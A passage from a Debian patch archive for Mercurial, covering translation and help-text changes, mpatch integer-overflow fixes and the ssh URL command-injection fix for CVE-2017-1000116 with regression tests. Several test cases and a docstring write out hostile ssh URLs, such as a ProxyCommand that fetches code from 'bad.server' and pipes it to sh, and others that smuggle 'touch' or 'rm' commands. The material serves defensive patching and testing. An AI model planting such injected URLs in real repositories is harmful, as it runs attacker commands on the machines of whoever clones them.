``sensible-editor``." msgstr "" msgid "" @@ -15564,7 +15565,7 @@ msgid "" " editor it uses is determined by looking at the environment\n" " variables HGEDITOR, VISUAL and EDITOR, in that order. The first\n" " non-empty one is chosen. If all of them are empty, the editor\n" -" defaults to 'vi'." +" defaults to 'sensible-editor'." msgstr "" msgid "" --- a/i18n/zh_CN.po +++ b/i18n/zh_CN.po @@ -5778,7 +5778,7 @@ msgstr "" msgid "Checking commit editor...\n" msgstr "" -msgid " No commit editor set and can't find vi in PATH\n" +msgid " No commit editor set and can't find sensible-editor in PATH\n" msgstr "" msgid " (specify a commit editor in your .hgrc file)\n" @@ -8666,7 +8666,7 @@ msgid "" " editor it uses is determined by looking at the environment\n" " variables HGEDITOR, VISUAL and EDITOR, in that order. The first\n" " non-empty one is chosen. If all of them are empty, the editor\n" -" defaults to 'vi'." +" defaults to 'sensible-editor'." msgstr "" msgid "" --- a/i18n/zh_TW.po +++ b/i18n/zh_TW.po @@ -6760,8 +6760,8 @@ msgstr "" msgid "Checking commit editor...\n" msgstr "檢查提交訊息編輯器...\n" -msgid " No commit editor set and can't find vi in PATH\n" -msgstr "沒有設定提交訊息編輯器,然後在PATH中也沒有vi\n" +msgid " No commit editor set and can't find sensible-editor in PATH\n" +msgstr "沒有設定提交訊息編輯器,然後在PATH中也沒有sensible-editor\n" msgid " (specify a commit editor in your configuration file)\n" msgstr "(在你的設定檔指明一個用來編輯提交訊息的編輯器)\n" @@ -9710,7 +9710,7 @@ msgid "" " editor it uses is determined by looking at the environment\n" " variables HGEDITOR, VISUAL and EDITOR, in that order. The first\n" " non-empty one is chosen. If all of them are empty, the editor\n" -" defaults to 'vi'." +" defaults to 'sensible-editor'." msgstr "" msgid "" --- a/mercurial/help/environment.txt +++ b/mercurial/help/environment.txt @@ -94,7 +94,7 @@ EDITOR editor it uses is determined by looking at the environment variables HGEDITOR, VISUAL and EDITOR, in that order. The first non-empty one is chosen. If all of them are empty, the editor - defaults to 'vi'. + defaults to 'sensible-editor'. PYTHONPATH This is used by Python to find imported modules and may need to be --- a/mercurial/help/config.txt +++ b/mercurial/help/config.txt @@ -1154,7 +1154,8 @@ User interface controls. Print debugging information. True or False. Default is False. ``editor`` - The editor to use during a commit. Default is ``$EDITOR`` or ``vi``. + The editor to use during a commit. Default is ``$EDITOR`` or + ``sensible-editor``. ``fallbackencoding`` Encoding to try if it's not possible to decode the changelog using --- a/i18n/ro.po +++ b/i18n/ro.po @@ -7722,7 +7722,7 @@ msgstr "" msgid "Checking commit editor...\n" msgstr "Se verifică editorul pentru commit...\n" -msgid " No commit editor set and can't find vi in PATH\n" +msgid " No commit editor set and can't find sensible-editor in PATH\n" msgstr "" msgid " (specify a commit editor in your configuration file)\n" @@ -11925,7 +11925,8 @@ msgstr "" msgid "" "``editor``\n" -" The editor to use during a commit. Default is ``$EDITOR`` or ``vi``." +" The editor to use during a commit. Default is ``$EDITOR`` or\n" +" ``sensible-editor``." msgstr "" msgid "" @@ -12570,7 +12571,7 @@ msgid "" " editor it uses is determined by looking at the environment\n" " variables HGEDITOR, VISUAL and EDITOR, in that order. The first\n" " non-empty one is chosen. If all of them are empty, the editor\n" -" defaults to 'vi'." +" defaults to 'sensible-editor'." msgstr "" msgid "" --- a/i18n/ru.po +++ b/i18n/ru.po @@ -12019,8 +12019,8 @@ msgstr " (шаблоны, похоже, msgid "checking commit editor...\n" msgstr "проверка редактора сообщений фиксации...\n" -msgid " No commit editor set and can't find vi in PATH\n" -msgstr " Редактор сообщений не установлен и vi не доступен в PATH\n" +msgid " No commit editor set and can't find sensible-editor in PATH\n" +msgstr " Редактор сообщений не установлен и sensible-editor не доступен в PATH\n" msgid " (specify a commit editor in your configuration file)\n" msgstr " (задайте редактор сообщений в вашем конфиге)\n" @@ -18656,10 +18656,12 @@ msgstr "" msgid "" "``editor``\n" -" The editor to use during a commit. Default is ``$EDITOR`` or ``vi``." +" The editor to use during a commit. Default is ``$EDITOR`` or\n" +" ``sensible-editor``." msgstr "" "``editor``\n" -" Редактор, вызываемый при фиксации. По умолчанию ``$EDITOR`` or ``vi``." +" Редактор, вызываемый при фиксации. По умолчанию ``$EDITOR`` or\n" +" ``sensible-editor``." msgid "" "``fallbackencoding``\n" @@ -19832,14 +19834,14 @@ msgid "" " editor it uses is determined by looking at the environment\n" " variables HGEDITOR, VISUAL and EDITOR, in that order. The first\n" " non-empty one is chosen. If all of them are empty, the editor\n" -" defaults to 'vi'." +" defaults to 'sensible-editor'." msgstr "" "EDITOR\n" " Иногда требуется открыть текстовый файл в редакторе, чтобы.\n" " внести изменения, например для написания сообщения фиксации.\n" " Используемый редактор определяется переменными среды HGEDITOR,\n" " VISUAL и EDITOR, именно в таком порядке. Выбирается первая\n" -" непустая переменная. Если они все пусты, используется 'vi'." +" непустая переменная. Если они все пусты, используется 'sensible-editor'." msgid "" "PYTHONPATH\n" debian/patches/CVE-2018-13346.patch0000664000000000000000000000141313373604476013337 0ustar # HG changeset patch # User Augie Fackler # Date 1524924552 14400 # Node ID faa924469635512b72868b1552a1866a0f91db20 # Parent 1acfc35d478cdae60cf62c6f07fa6b6ad3070ea7 mpatch: ensure fragment start isn't past the end of orig (SEC) Caught by oss-fuzz fuzzer during development. This defect is OVE-20180430-0004 or CVE-2018-13346. --- a/mercurial/mpatch.c +++ b/mercurial/mpatch.c @@ -360,7 +360,8 @@ static int apply(char *buf, const char *orig, Py_ssize_t len, struct flist *l) char *p = buf; while (f != l->tail) { - if (f->start < last || f->end > len || last < 0) { + if (f->start < last || f->start > len || f->end > len || + last < 0) { if (!PyErr_Occurred()) PyErr_SetString(mpatch_Error, "invalid patch"); debian/patches/deb_specific__optional-dependencies0000664000000000000000000001575412261301466017646 0ustar Suggest Debian packages for some optional dependencies. --- a/hgext/bugzilla.py +++ b/hgext/bugzilla.py @@ -354,7 +354,8 @@ class bzmysql(bzaccess): import MySQLdb as mysql bzmysql._MySQLdb = mysql except ImportError, err: - raise util.Abort(_('python mysql support not available: %s') % err) + raise util.Abort(_('python mysql support not available: %s') % err + + _(' (try installing the %s package)') % 'python-mysqldb') bzaccess.__init__(self, ui) --- a/hgext/convert/bzr.py +++ b/hgext/convert/bzr.py @@ -44,7 +44,8 @@ class bzr_source(converter_source): # access bzrlib stuff bzrdir except NameError: - raise NoRepo(_('Bazaar modules could not be loaded')) + raise NoRepo(_('Bazaar modules could not be loaded') + + _(' (try installing the %s package)') % 'bzr') path = os.path.abspath(path) self._checkrepotype(path) --- a/hgext/convert/common.py +++ b/hgext/convert/common.py @@ -28,11 +28,12 @@ def decodeargs(s): class MissingTool(Exception): pass -def checktool(exe, name=None, abort=True): +def checktool(exe, name=None, abort=True, debname=None): name = name or exe if not util.findexe(exe): exc = abort and util.Abort or MissingTool - raise exc(_('cannot find required "%s" tool') % name) + raise exc(_('cannot find required "%s" tool') % name + + (debname and _(' (try installing the %s package)') % debname or '')) class NoRepo(Exception): pass --- a/hgext/convert/cvs.py +++ b/hgext/convert/cvs.py @@ -22,7 +22,7 @@ class convert_cvs(converter_source): if not os.path.exists(cvs): raise NoRepo(_("%s does not look like a CVS checkout") % path) - checktool('cvs') + checktool('cvs', debname='cvs') self.changeset = None self.files = {} --- a/hgext/convert/darcs.py +++ b/hgext/convert/darcs.py @@ -36,14 +36,15 @@ class darcs_source(converter_source, com if not os.path.exists(os.path.join(path, '_darcs')): raise NoRepo(_("%s does not look like a darcs repository") % path) - checktool('darcs') + checktool('darcs', debname='darcs') version = self.run0('--version').splitlines()[0].strip() if version < '2.1': raise util.Abort(_('darcs version 2.1 or newer needed (found %r)') % version) if "ElementTree" not in globals(): - raise util.Abort(_("Python ElementTree module is not available")) + raise util.Abort(_("Python ElementTree module is not available") + + _(" (try installing the %s package)") % 'python-celementtree') self.path = os.path.realpath(path) --- a/hgext/convert/git.py +++ b/hgext/convert/git.py @@ -79,7 +79,7 @@ class convert_git(converter_source): if not os.path.exists(path + "/objects"): raise NoRepo(_("%s does not look like a Git repository") % path) - checktool('git', 'git') + checktool('git', 'git', debname='git-core') self.path = path self.submodules = [] --- a/hgext/convert/gnuarch.py +++ b/hgext/convert/gnuarch.py @@ -42,7 +42,8 @@ class gnuarch_source(converter_source, c if util.findexe('tla'): self.execmd = 'tla' else: - raise util.Abort(_('cannot find a GNU Arch tool')) + raise util.Abort(_('cannot find a GNU Arch tool') + + _(' (try installing the %s package)') % 'tla') commandline.__init__(self, ui, self.execmd) --- a/hgext/convert/monotone.py +++ b/hgext/convert/monotone.py @@ -66,7 +66,7 @@ class monotone_source(converter_source, self.files = None self.dirs = None - checktool('mtn', abort=False) + checktool('mtn', abort=False, debname='monotone') def mtnrun(self, *args, **kwargs): if self.automatestdio: --- a/hgext/convert/subversion.py +++ b/hgext/convert/subversion.py @@ -20,6 +20,7 @@ from cStringIO import StringIO from common import NoRepo, MissingTool, commit, encodeargs, decodeargs from common import commandline, converter_source, converter_sink, mapfile from common import makedatetimestamp +from common import checktool try: from svn.core import SubversionException, Pool @@ -237,16 +238,19 @@ class svn_source(converter_source): raise NoRepo(_("%s does not look like a Subversion repository") % url) if svn is None: - raise MissingTool(_('could not load Subversion python bindings')) + raise MissingTool(_('could not load Subversion python bindings') + + _(' (try installing the %s package)') % 'python-subversion') try: version = svn.core.SVN_VER_MAJOR, svn.core.SVN_VER_MINOR if version < (1, 4): raise MissingTool(_('Subversion python bindings %d.%d found, ' - '1.4 or later required') % version) + '1.4 or later required') % version + + _(' (try upgrading the %s package)') % 'python-subversion') except AttributeError: raise MissingTool(_('Subversion python bindings are too old, 1.4 ' - 'or later required')) + 'or later required') + + _(' (try upgrading the %s package)') % 'python-subversion') self.lastrevs = {} @@ -1025,6 +1029,8 @@ class svn_sink(converter_sink, commandli return self.join('hg-authormap') def __init__(self, ui, path): + checktool('svn', debname='subversion') + checktool('svnadmin', debname='subversion') converter_sink.__init__(self, ui, path) commandline.__init__(self, ui, 'svn') --- a/mercurial/hgweb/server.py +++ b/mercurial/hgweb/server.py @@ -207,7 +207,8 @@ class _httprequesthandleropenssl(_httpre import OpenSSL OpenSSL.SSL.Context except ImportError: - raise util.Abort(_("SSL support is unavailable")) + raise util.Abort(_("SSL support is unavailable") + + _(" (try installing the %s package)") % 'python-openssl') ctx = OpenSSL.SSL.Context(OpenSSL.SSL.SSLv23_METHOD) ctx.use_privatekey_file(ssl_cert) ctx.use_certificate_file(ssl_cert) @@ -248,7 +249,8 @@ class _httprequesthandlerssl(_httpreques import ssl ssl.wrap_socket except ImportError: - raise util.Abort(_("SSL support is unavailable")) + raise util.Abort(_("SSL support is unavailable") + + _(" (try installing the %s package)") % 'python-openssl') httpserver.socket = ssl.wrap_socket(httpserver.socket, server_side=True, certfile=ssl_cert, ssl_version=ssl.PROTOCOL_SSLv23) debian/patches/CVE-2018-13347-extras.patch0000664000000000000000000001463413373604466014654 0ustar Backport of six additional patches for CVE-2018-13347. # HG changeset patch # User Augie Fackler # Date 1525140822 14400 # Node ID 1ec4cb8cbc87004ffbeeb1b5d98acef04c38d59a # Parent faa924469635512b72868b1552a1866a0f91db20 mpatch: introduce a safeadd() helper to work around UB int overflow We're about to make extensive use of this. This change duplicates some stdbool.h portability hacks from cext/util.h. We should probably clean that up in the future, but we'll skip that for now in order to make security backports easier. # HG changeset patch # User Augie Fackler # Date 1525366460 14400 # Node ID b8b253aec9538b2614295f6ba4ecefe335ad8bf5 # Parent 1ec4cb8cbc87004ffbeeb1b5d98acef04c38d59a mpatch: introduce a safesub() helper as well Same reason as safeadd(). # HG changeset patch # User Augie Fackler # Date 1525140911 14400 # Node ID 0b208c13781c18deae8fddb1dd63677f61fd64b5 # Parent b8b253aec9538b2614295f6ba4ecefe335ad8bf5 mpatch: fix UB in int overflows in gather() (SEC) # HG changeset patch # User Augie Fackler # Date 1525141213 14400 # Node ID 7f22ef3c0ee721da8a568613dff48a7051fad8d7 # Parent 0b208c13781c18deae8fddb1dd63677f61fd64b5 mpatch: fix UB integer overflows in discard() (SEC) # HG changeset patch # User Augie Fackler # Date 1525141386 14400 # Node ID 59837a16896da36d26e795881f4ba4454cb8ae41 # Parent 7f22ef3c0ee721da8a568613dff48a7051fad8d7 mpatch: avoid integer overflow in mpatch_decode (SEC) # HG changeset patch # User Augie Fackler # Date 1525141498 14400 # Node ID 9c5ced5276d6e7d54f7c3dadf5247b7ee98ec79c # Parent 59837a16896da36d26e795881f4ba4454cb8ae41 mpatch: avoid integer overflow in combine() (SEC) All the callers of this function can handle a NULL return, so that appears to be the "safe" way to report an error. --- a/mercurial/mpatch.c +++ b/mercurial/mpatch.c @@ -22,11 +22,21 @@ #define PY_SSIZE_T_CLEAN #include +#include #include #include #include "util.h" +/* VC9 doesn't include bool and lacks stdbool.h based on cext/util.h */ +#if defined(_MSC_VER) || __STDC_VERSION__ < 199901L +#define true 1 +#define false 0 +typedef unsigned char bool; +#else +#include +#endif + static char mpatch_doc[] = "Efficient binary patching."; static PyObject *mpatch_Error; @@ -74,6 +84,35 @@ static Py_ssize_t lsize(struct flist *a) return a->tail - a->head; } +/* add helper to add src and *dest iff it won't overflow */ +static inline bool safeadd(int src, int *dest) +{ + if ((src > 0) == (*dest > 0)) { + if (*dest > 0) { + if (src > (INT_MAX - *dest)) { + return false; + } + } else { + if (src < (INT_MIN - *dest)) { + return false; + } + } + } + *dest += src; + return true; +} + +/* subtract src from dest and store result in dest */ +static inline bool safesub(int src, int *dest) +{ + if (((src > 0) && (*dest < INT_MIN + src)) || + ((src < 0) && (*dest > INT_MAX + src))) { + return false; + } + *dest -= src; + return true; +} + /* move hunks in source that are less cut to dest, compensating for changes in offset. the last hunk may be split if necessary. */ @@ -83,18 +122,37 @@ static int gather(struct flist *dest, struct flist *src, int cut, int offset) int postend, c, l; while (s != src->tail) { - if (s->start + offset >= cut) + int soffset = s->start; + if (!safeadd(offset, &soffset)) + break; /* add would overflow, oh well */ + if (soffset >= cut) break; /* we've gone far enough */ - postend = offset + s->start + s->len; + postend = offset; + if (!safeadd(s->start, &postend) || + !safeadd(s->len, &postend)) { + break; + } if (postend <= cut) { /* save this hunk */ - offset += s->start + s->len - s->end; + int tmp = s->start; + if (!safesub(s->end, &tmp)) { + break; + } + if (!safeadd(s->len, &tmp)) { + break; + } + if (!safeadd(tmp, &offset)) { + break; /* add would overflow, oh well */ + } *d++ = *s++; } else { /* break up this hunk */ - c = cut - offset; + c = cut; + if (!safesub(offset, &c)) { + break; + } if (s->end < c) c = s->end; l = cut - offset - s->start; @@ -128,16 +186,40 @@ static int discard(struct flist *src, int cut, int offset) int postend, c, l; while (s != src->tail) { - if (s->start + offset >= cut) + int cmpcut = s->start; + if (!safeadd(offset, &cmpcut)) { + break; + } + if (cmpcut >= cut) break; - postend = offset + s->start + s->len; + postend = offset; + if (!safeadd(s->start, &postend)) { + break; + } + if (!safeadd(s->len, &postend)) { + break; + } if (postend <= cut) { - offset += s->start + s->len - s->end; + /* do the subtraction first to avoid UB integer overflow + */ + int tmp = s->start; + if (!safesub(s->end, &tmp)) { + break; + } + if (!safeadd(s->len, &tmp)) { + break; + } + if (!safeadd(tmp, &offset)) { + break; + } s++; } else { - c = cut - offset; + c = cut; + if (!safesub(offset, &c)) { + break; + } if (s->end < c) c = s->end; l = cut - offset - s->start; @@ -179,8 +261,18 @@ static struct flist *combine(struct flist *a, struct flist *b) /* insert new hunk */ ct = c->tail; - ct->start = bh->start - offset; - ct->end = bh->end - post; + ct->start = bh->start; + ct->end = bh->end; + if (!safesub(offset, &(ct->start)) || + !safesub(post, &(ct->end))) { + /* It was already possible to exit + * this function with a return value + * of NULL before the safesub()s were + * added, so this should be fine. */ + lfree(c); + c = NULL; + goto done; + } ct->len = bh->len; ct->data = bh->data; c->tail++; @@ -191,7 +283,7 @@ static struct flist *combine(struct flist *a, struct flist *b) memcpy(c->tail, a->head, sizeof(struct frag) * lsize(a)); c->tail += lsize(a); } - +done: lfree(a); lfree(b); return c; @@ -215,10 +307,15 @@ static struct flist *decode(const char *bin, Py_ssize_t len) lt->start = getbe32(bin + pos); lt->end = getbe32(bin + pos + 4); lt->len = getbe32(bin + pos + 8); - lt->data = bin + pos + 12; - pos += 12 + lt->len; - if (lt->start > lt->end || lt->len < 0) + if (lt->start < 0 || lt->start > lt->end || lt->len < 0) break; /* sanity check */ + if (!safeadd(12, &pos)) { + break; + } + lt->data = bin + pos; + if (!safeadd(lt->len, &pos)) { + break; + } lt++; } debian/patches/CVE-2017-1000116.patch0000664000000000000000000003527713375313165013477 0ustar Description: fix for CVE-2017-1000116 (command injection on clients through malicious ssh URLs) This is a collapsed patch based on a series of 11 patches from upstream, backported to 3.7 by Atlassian, then backported to 2.2.2 by Debian. Changes were mostly trivial, apart from requiring the backport of the checksafessh function and tests output were adapted to match cosmetic changes between the versions. Author: Antoine Beaupré Bug-Debian: https://bugs.debian.org/871710 Origin: upstream, based on the Atlassian backport (0fe60a0:b143339) from https://bitbucket.org/atlassian/mercurial/commits/branch/sec-3.7 Forwarded: not-needed Last-Update: 2017-08-28 --- a/mercurial/posix.py +++ b/mercurial/posix.py @@ -9,6 +9,8 @@ from i18n import _ import encoding import os, sys, errno, stat, getpass, pwd, grp, socket, tempfile, unicodedata +from . import error + posixfile = open normpath = os.path.normpath samestat = os.path.samestat @@ -64,7 +66,13 @@ def parsepatchoutput(output_line): def sshargs(sshcmd, host, user, port): '''Build argument list for ssh''' args = user and ("%s@%s" % (user, host)) or host - return port and ("%s -p %s" % (args, port)) or args + if '-' in args[:1]: + raise error.Abort( + _('illegal ssh hostname or username starting with -: %s') % args) + args = shellquote(args) + if port: + args = '-p %s %s' % (shellquote(port), args) + return args def isexec(f): """check whether a file is executable""" --- a/mercurial/sshpeer.py +++ b/mercurial/sshpeer.py @@ -37,6 +37,8 @@ class sshpeer(wireproto.wirepeer): if u.scheme != 'ssh' or not u.host or u.path is None: self._abort(error.RepoError(_("couldn't parse location %s") % path)) + util.checksafessh(path) + self.user = u.user if u.passwd is not None: self._abort(error.RepoError(_("password in URL not supported"))) @@ -47,10 +49,7 @@ class sshpeer(wireproto.wirepeer): sshcmd = self.ui.config("ui", "ssh", "ssh") remotecmd = self.ui.config("ui", "remotecmd", "hg") - args = util.sshargs(sshcmd, - _serverquote(self.host), - _serverquote(self.user), - _serverquote(self.port)) + args = util.sshargs(sshcmd, self.host, self.user, self.port) if create: cmd = '%s %s %s' % (sshcmd, args, --- a/mercurial/subrepo.py +++ b/mercurial/subrepo.py @@ -1005,6 +1005,10 @@ class svnsubrepo(abstractsubrepo): # The revision must be specified at the end of the URL to properly # update to a directory which has since been deleted and recreated. args.append('%s@%s' % (state[0], state[1])) + + # SEC: check that the ssh url is safe + util.checksafessh(state[0]) + status, err = self._svncommand(args, failok=True) _sanitize(self._ui, self._path) if not re.search('Checked out revision [0-9]+.', status): @@ -1209,6 +1213,9 @@ class gitsubrepo(abstractsubrepo): def _fetch(self, source, revision): if self._gitmissing(): + # SEC: check for safe ssh url + util.checksafessh(source) + source = self._abssource(source) self._ui.status(_('cloning subrepo %s from %s\n') % (self._relpath, source)) --- a/mercurial/util.py +++ b/mercurial/util.py @@ -1884,6 +1884,21 @@ def hasdriveletter(path): def urllocalpath(path): return url(path, parsequery=False, parsefragment=False).localpath() +def checksafessh(path): + """check if a path / url is a potentially unsafe ssh exploit (SEC) + + This is a sanity check for ssh urls. ssh will parse the first item as + an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path. + Let's prevent these potentially exploited urls entirely and warn the + user. + + Raises an error.Abort when the url is unsafe. + """ + path = _urlunquote(path) + if path.startswith('ssh://-') or path.startswith('svn+ssh://-'): + raise error.Abort(_('potentially unsafe url: %r') % + (path,)) + def hidepassword(u): '''hide user credential in a url string''' u = url(u) --- a/mercurial/windows.py +++ b/mercurial/windows.py @@ -9,6 +9,8 @@ from i18n import _ import osutil, encoding import errno, msvcrt, os, re, stat, sys, _winreg +from . import error + import win32 executablepath = win32.executablepath getuser = win32.getuser @@ -100,7 +102,14 @@ def sshargs(sshcmd, host, user, port): '''Build argument list for ssh or Plink''' pflag = 'plink' in sshcmd.lower() and '-P' or '-p' args = user and ("%s@%s" % (user, host)) or host - return port and ("%s %s %s" % (args, pflag, port)) or args + if args.startswith('-') or args.startswith('/'): + raise error.Abort( + _('illegal ssh hostname or username starting with - or /: %s') % + args) + args = shellquote(args) + if port: + args = '%s %s %s' % (pflag, shellquote(port), args) + return args def setflags(f, l, x): pass --- a/tests/test-clone.t +++ b/tests/test-clone.t @@ -621,3 +621,66 @@ re-enable perm to allow deletion #endif $ cd .. + +SEC: check for unsafe ssh url + + $ cat >> $HGRCPATH << EOF + > [ui] + > ssh = sh -c "read l; read l; read l" + > EOF + + $ hg clone 'ssh://-oProxyCommand=touch${IFS}owned/path' + abort: potentially unsafe url: 'ssh://-oProxyCommand=touch${IFS}owned/path' + [255] + $ hg clone 'ssh://%2DoProxyCommand=touch${IFS}owned/path' + abort: potentially unsafe url: 'ssh://-oProxyCommand=touch${IFS}owned/path' + [255] + $ hg clone 'ssh://fakehost|touch%20owned/path' + abort: no suitable response from remote hg! + [255] + $ hg clone 'ssh://fakehost%7Ctouch%20owned/path' + abort: no suitable response from remote hg! + [255] + + $ hg clone 'ssh://-oProxyCommand=touch owned%20foo@example.com/nonexistent/path' + abort: potentially unsafe url: 'ssh://-oProxyCommand=touch owned foo@example.com/nonexistent/path' + [255] + +#if windows + $ hg clone "ssh://%26touch%20owned%20/" --debug + running sh -c "read l; read l; read l" "&touch owned " "hg -R . serve --stdio" + sending hello command + sending between command + abort: no suitable response from remote hg! + [255] + $ hg clone "ssh://example.com:%26touch%20owned%20/" --debug + running sh -c "read l; read l; read l" -p "&touch owned " example.com "hg -R . serve --stdio" + sending hello command + sending between command + abort: no suitable response from remote hg! + [255] +#else + $ hg clone "ssh://%3btouch%20owned%20/" --debug + running sh -c "read l; read l; read l" ';touch owned ' 'hg -R . serve --stdio' + sending hello command + sending between command + abort: no suitable response from remote hg! + [255] + $ hg clone "ssh://example.com:%3btouch%20owned%20/" --debug + running sh -c "read l; read l; read l" -p ';touch owned ' 'example.com' 'hg -R . serve --stdio' + sending hello command + sending between command + abort: no suitable response from remote hg! + [255] +#endif + + $ hg clone "ssh://v-alid.example.com/" --debug + running sh -c "read l; read l; read l" 'v-alid.example.com' 'hg -R . serve --stdio' + sending hello command + sending between command + abort: no suitable response from remote hg! + [255] + +We should not have created a file named owned - if it exists, the +attack succeeded. + $ if test -f owned; then echo 'you got owned'; fi --- a/tests/test-pull.t +++ b/tests/test-pull.t @@ -89,4 +89,26 @@ regular shell commands. $ URL=`python -c "import os; print 'file://localhost' + ('/' + os.getcwd().replace(os.sep, '/')).replace('//', '/') + '/../test'"` $ hg pull -q "$URL" +SEC: check for unsafe ssh url + + $ cat >> $HGRCPATH << EOF + > [ui] + > ssh = sh -c "read l; read l; read l" + > EOF + + $ hg pull 'ssh://-oProxyCommand=touch${IFS}owned/path' + abort: potentially unsafe url: 'ssh://-oProxyCommand=touch${IFS}owned/path' + [255] + $ hg pull 'ssh://%2DoProxyCommand=touch${IFS}owned/path' + abort: potentially unsafe url: 'ssh://-oProxyCommand=touch${IFS}owned/path' + [255] + $ hg pull 'ssh://fakehost|touch${IFS}owned/path' + abort: no suitable response from remote hg! + [255] + $ hg pull 'ssh://fakehost%7Ctouch%20owned/path' + abort: no suitable response from remote hg! + [255] + + $ [ ! -f owned ] || echo 'you got owned' + $ cd .. --- a/tests/test-push-r.t +++ b/tests/test-push-r.t @@ -147,3 +147,29 @@ 4 files, 9 changesets, 7 total revisions $ cd .. + +SEC: check for unsafe ssh url + + $ cat >> $HGRCPATH << EOF + > [ui] + > ssh = sh -c "read l; read l; read l" + > EOF + + $ hg -R test-7 push 'ssh://-oProxyCommand=touch${IFS}owned/path' + pushing to ssh://-oProxyCommand%3Dtouch%24%7BIFS%7Downed/path + abort: potentially unsafe url: 'ssh://-oProxyCommand=touch${IFS}owned/path' + [255] + $ hg -R test-7 push 'ssh://%2DoProxyCommand=touch${IFS}owned/path' + pushing to ssh://-oProxyCommand%3Dtouch%24%7BIFS%7Downed/path + abort: potentially unsafe url: 'ssh://-oProxyCommand=touch${IFS}owned/path' + [255] + $ hg -R test-7 push 'ssh://fakehost|touch${IFS}owned/path' + pushing to ssh://fakehost%7Ctouch%24%7BIFS%7Downed/path + abort: no suitable response from remote hg! + [255] + $ hg -R test-7 push 'ssh://fakehost%7Ctouch%20owned/path' + pushing to ssh://fakehost%7Ctouch%20owned/path + abort: no suitable response from remote hg! + [255] + + $ [ ! -f owned ] || echo 'you got owned' --- a/tests/test-subrepo-git.t +++ b/tests/test-subrepo-git.t @@ -600,3 +600,35 @@ whitelisting of ext should be respected (that's the git submodule behaviour) cloning subrepo s from ext::sh -c echo% pwned% >&2 abort: git clone error 128 in s (in subrepo s) [255] + +test for ssh exploit with git subrepos 2017-07-25 + + $ hg init malicious-proxycommand + $ cd malicious-proxycommand + $ echo 's = [git]ssh://-oProxyCommand=rm${IFS}non-existent/path' > .hgsub + $ git init s + Initialized empty Git repository in $TESTTMP/malicious-proxycommand/s/.git/ + $ cd s + $ git commit --allow-empty -m 'empty' + [master (root-commit) 153f934] empty + $ cd .. + $ hg add .hgsub + $ hg ci -m 'add subrepo' + $ cd .. + $ hg clone malicious-proxycommand malicious-proxycommand-clone + updating to branch default + abort: potentially unsafe url: 'ssh://-oProxyCommand=rm${IFS}non-existent/path' (in subrepo s) + [255] + +also check that a percent encoded '-' (%2D) doesn't work + + $ cd malicious-proxycommand + $ echo 's = [git]ssh://%2DoProxyCommand=rm${IFS}non-existent/path' > .hgsub + $ hg ci -m 'change url to percent encoded' + $ cd .. + $ rm -r malicious-proxycommand-clone + $ hg clone malicious-proxycommand malicious-proxycommand-clone + updating to branch default + abort: potentially unsafe url: 'ssh://-oProxyCommand=rm${IFS}non-existent/path' (in subrepo s) + [255] + --- a/tests/test-subrepo-svn.t +++ b/tests/test-subrepo-svn.t @@ -632,3 +632,43 @@ well. Checked out revision 15. 2 files updated, 0 files merged, 0 files removed, 0 files unresolved $ cd .. + +SEC: test for ssh exploit + + $ hg init ssh-vuln + $ cd ssh-vuln + $ echo "s = [svn]$SVNREPOURL/src" >> .hgsub + $ svn co --quiet "$SVNREPOURL"/src s + $ hg add .hgsub + $ hg ci -m1 + $ echo "s = [svn]svn+ssh://-oProxyCommand=touch%20owned%20nested" > .hgsub + $ hg ci -m2 + $ cd .. + $ hg clone ssh-vuln ssh-vuln-clone + updating to branch default + abort: potentially unsafe url: 'svn+ssh://-oProxyCommand=touch owned nested' (in subrepo s) + [255] + +also check that a percent encoded '-' (%2D) doesn't work + + $ cd ssh-vuln + $ echo "s = [svn]svn+ssh://%2DoProxyCommand=touch%20owned%20nested" > .hgsub + $ hg ci -m3 + $ cd .. + $ rm -r ssh-vuln-clone + $ hg clone ssh-vuln ssh-vuln-clone + updating to branch default + abort: potentially unsafe url: 'svn+ssh://-oProxyCommand=touch owned nested' (in subrepo s) + [255] + +also check that hiding the attack in the username doesn't work: + + $ cd ssh-vuln + $ echo "s = [svn]svn+ssh://%2DoProxyCommand=touch%20owned%20foo@example.com/nested" > .hgsub + $ hg ci -m3 + $ cd .. + $ rm -r ssh-vuln-clone + $ hg clone ssh-vuln ssh-vuln-clone + updating to branch default + abort: potentially unsafe url: 'svn+ssh://-oProxyCommand=touch owned foo@example.com/nested' (in subrepo s) + [255] --- a/tests/test-subrepo.t +++ b/tests/test-subrepo.t @@ -1233,3 +1233,76 @@ Courtesy phases synchronisation to publishing server does not block the push no changes found [1] +test for ssh exploit 2017-07-25 + + $ cat >> $HGRCPATH << EOF + > [ui] + > ssh = sh -c "read l; read l; read l" + > EOF + + $ hg init malicious-proxycommand + $ cd malicious-proxycommand + $ echo 's = [hg]ssh://-oProxyCommand=touch${IFS}owned/path' > .hgsub + $ hg init s + $ cd s + $ echo init > init + $ hg add + adding init + $ hg commit -m init + $ cd .. + $ hg add .hgsub + $ hg ci -m 'add subrepo' + $ cd .. + $ hg clone malicious-proxycommand malicious-proxycommand-clone + updating to branch default + abort: potentially unsafe url: 'ssh://-oProxyCommand=touch${IFS}owned/path' (in subrepo s) + [255] + +also check that a percent encoded '-' (%2D) doesn't work + + $ cd malicious-proxycommand + $ echo 's = [hg]ssh://%2DoProxyCommand=touch${IFS}owned/path' > .hgsub + $ hg ci -m 'change url to percent encoded' + $ cd .. + $ rm -r malicious-proxycommand-clone + $ hg clone malicious-proxycommand malicious-proxycommand-clone + updating to branch default + abort: potentially unsafe url: 'ssh://-oProxyCommand=touch${IFS}owned/path' (in subrepo s) + [255] + +also check for a pipe + + $ cd malicious-proxycommand + $ echo 's = [hg]ssh://fakehost|touch${IFS}owned/path' > .hgsub + $ hg ci -m 'change url to pipe' + $ cd .. + $ rm -r malicious-proxycommand-clone + $ hg clone malicious-proxycommand malicious-proxycommand-clone + updating to branch default + abort: no suitable response from remote hg! + [255] + $ [ ! -f owned ] || echo 'you got owned' + +also check that a percent encoded '|' (%7C) doesn't work + + $ cd malicious-proxycommand + $ echo 's = [hg]ssh://fakehost%7Ctouch%20owned/path' > .hgsub + $ hg ci -m 'change url to percent encoded pipe' + $ cd .. + $ rm -r malicious-proxycommand-clone + $ hg clone malicious-proxycommand malicious-proxycommand-clone + updating to branch default + abort: no suitable response from remote hg! + [255] + $ [ ! -f owned ] || echo 'you got owned' + +and bad usernames: + $ cd malicious-proxycommand + $ echo 's = [hg]ssh://-oProxyCommand=touch owned@example.com/path' > .hgsub + $ hg ci -m 'owned username' + $ cd .. + $ rm -r malicious-proxycommand-clone + $ hg clone malicious-proxycommand malicious-proxycommand-clone + updating to branch default + abort: potentially unsafe 